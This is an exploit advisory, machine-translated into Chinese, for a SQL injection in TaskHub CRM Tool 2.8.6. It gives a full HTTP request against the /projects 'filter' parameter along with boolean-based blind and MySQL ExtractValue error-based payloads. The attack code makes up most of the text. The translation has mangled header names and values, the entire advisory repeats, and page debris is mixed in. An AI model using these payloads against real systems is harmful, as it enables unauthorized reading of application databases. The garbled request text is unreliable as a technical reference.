#利用标题: TaskHub CRM工具2.8.6 -SQL注入
#日期: 2023-08-12
#利用作者: ahmetümitBayram
#vendor:
#在: Kali Linux MacOS上测试
#CVE: N/A。
### 要求###
get /projects?filter=未启动http /1.1
HOST: LOCALHOST
Cookie: CSRF_COOKIE_NAME=A3E6A7D379A3E3E5F160D72C182FFF8A8A8C8;
ci_session=TGU03EOATVSONH7V986G1VJ57B8SUFH9
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV:109.0)
壁虎/20100101 Firefox/116.0
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8
Accept-Language: TR-TR,TR; Q=0.8,EN-US; Q=0.5,en; q=0.3
Accept-incoding: Gzip,放气
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:无
sec-fetch-user:1
TE:拖车
连接:关闭
###参数有效载荷###
参数:过滤器(GET)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: filter=notstarted'和2978=2978和'vmqo'='vmqo
type:基于错误的
title: mysql=5.1和基于错误的- 在哪里,在哪里,订购或组。
条款(extractValue)
PAYLOAD:过滤器=notstarted'and
ExtractValue(5313,Concat(0x5c,0x716A707A71,(Select
(ELT(5313=5313,1))),0x71787a6b71)和'ronq'='ronq
#日期: 2023-08-12
#利用作者: ahmetümitBayram
#vendor:
正在加载...
codecanyon.net
#CVE: N/A。
### 要求###
get /projects?filter=未启动http /1.1
HOST: LOCALHOST
Cookie: CSRF_COOKIE_NAME=A3E6A7D379A3E3E5F160D72C182FFF8A8A8C8;
ci_session=TGU03EOATVSONH7V986G1VJ57B8SUFH9
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV:109.0)
壁虎/20100101 Firefox/116.0
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8
Accept-Language: TR-TR,TR; Q=0.8,EN-US; Q=0.5,en; q=0.3
Accept-incoding: Gzip,放气
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:无
sec-fetch-user:1
TE:拖车
连接:关闭
###参数有效载荷###
参数:过滤器(GET)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: filter=notstarted'和2978=2978和'vmqo'='vmqo
type:基于错误的
title: mysql=5.1和基于错误的- 在哪里,在哪里,订购或组。
条款(extractValue)
PAYLOAD:过滤器=notstarted'and
ExtractValue(5313,Concat(0x5c,0x716A707A71,(Select
(ELT(5313=5313,1))),0x71787a6b71)和'ronq'='ronq